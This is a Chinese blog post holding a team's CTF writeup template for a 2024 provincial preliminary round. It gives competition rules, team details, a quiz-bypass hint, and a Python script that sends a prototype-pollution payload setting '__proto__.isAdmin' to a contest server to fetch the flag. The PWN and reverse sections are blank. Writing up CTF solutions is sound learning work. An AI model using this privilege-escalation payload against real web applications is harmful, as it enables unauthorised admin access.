chaye的博客

11.2省赛初赛

团队-解题思路

请注意

1. 解题过程中，关键步骤不可省略，不可含糊其辞、一笔带过。

2. 解题过程中如是自己编写的脚本，不可省略，不可截图（代码字体可以调小；而如果代码太长，则贴关键代码函数）。

3. 所有解出的题目都必须书写WRITEUP，缺少一个则视该WRITEUP无效，成绩将无效。

4. WRITEUP如过于简略和敷衍，导致无法形成逻辑链条推断出对题目有分析和解决的能力，该WRITEUP可能被视为无效，成绩将无效。

5. 提交PDF版本即可。

6.必须包含获得flag截图。

7.每只队伍由队长统一提交一份解题思路即可，所有解题过程需保存在一个pdf内上传。

8.平台仅保留队伍最后一份解题思路，此前提交的解题思路将会自动覆盖。

1.** 团队信息**

团队名称：Alkaid

学校:浙江工商大学

队员组成：王一涵 叶凌俊 周晋逸

排名：151

2.** **解题情况

答题情况截图

3.** 具体WP**

题目按照顺序填写

签到

题目以一名称：网安知识大挑战

把原来显示重来的js代码也换成成功 然后随便乱答就可以了

2、

WEB

题目一名称： easyjs

import requests
def create_note():
    response = requests.post('http://139.155.126.78:38372/api/notes', json={
        'id': 'myNote',
        '__proto__': {
            'isAdmin': True  
        }
    })
    return response


def get_flag():
    response = requests.get('http://139.155.126.78:38372/api/flag', headers={
        'note-id': 'myNote'  
    })
    return response


if __name__ == "__main__":
    create_response = create_note()
    
    if create_response.status_code == 200:
        print("Note created successfully.")
        
        
        flag_response = get_flag()
        
        if flag_response.status_code == 200:
            print("Flag:", flag_response.json().get('flag'))
        else:
            print("Failed to get flag:", flag_response.json())
    else:
        print("Failed to create note:", create_response.json())

请注意添加关键步骤截图

获取flag截图

题目二名称：

PWN

1

---

REVERSE

更新: 2024-11-02 16:58:36
原文: https://www.yuque.com/chaye-apqbl/vsc85q/cp3xgbk1detxdf74